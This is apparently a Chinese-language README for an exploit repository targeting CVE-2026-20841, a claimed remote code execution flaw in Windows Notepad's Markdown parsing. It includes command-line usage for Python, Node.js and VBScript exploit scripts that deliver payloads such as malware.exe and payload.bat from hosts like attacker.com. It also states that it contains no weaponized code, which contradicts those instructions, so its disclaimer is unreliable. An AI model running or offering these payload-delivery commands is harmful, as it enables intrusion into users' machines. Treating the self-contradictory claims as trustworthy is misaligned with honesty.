安全研究与技术分析仓库
⚠️ 本仓库仅供教育、防御和研究目的使用。
CVE-2026-20841 是一个影响 Microsoft Windows 记事本 Markdown 处理功能的严重远程代码执行 (RCE) 漏洞。
当受影响的 Windows 记事本版本打开特制文件时,攻击者可能触发任意代码执行。
| 产品 | 状态 |
|---|---|
| Windows 11 记事本 | 受影响 |
| Windows 10 记事本 | 受影响 |
| 已更新/修补版本 | 不受影响 |
python CVE-2026-20841.py 192.168.1.100 80 malware.exe
Node.js 版本
node CVE-2026-20841.js <host> <port> <payload-filename>
示例:
node CVE-2026-20841.js attacker.com 445 payload.bat
VBScript 版本 (Windows 原生)
cscript //nologo CVE-2026-20841.vbs <host> <port> <payload-filename>
示例:
cscript //nologo CVE-2026-20841.vbs 192.168.1.45 80 update.exe
该漏洞存在于 Windows 记事本的 Markdown 内容处理功能中。
打开特制文件可能触发不安全的内存操作,从而导致在当前用户上下文中执行任意代码。
攻击者
│
▼
特制 Markdown 文件
│
▼
受害者打开文件
│
▼
有漏洞的 Markdown 解析器
│
▼
内存损坏
│
▼
代码执行
操作系统 : Windows 11
应用程序 : 记事本
架构 : x64
调试器 : WinDbg
分析方式 : 静态 + 动态
本仓库 不 包含武器化利用代码。
提供的信息仅用于以下目的:
用户有责任遵守所有适用的法律法规。
网络安全研究 • 漏洞分析 • 防御安全
| 字段 | 值 |
|---|
| CVE | CVE-2026-20841 |
| 类型 | 远程代码执行 |
| 攻击向量 | 特制文件 |
| 用户交互 | 需要 |
| 所需权限 | 无 |
| 严重性 | 严重 |
| 厂商 | Microsoft |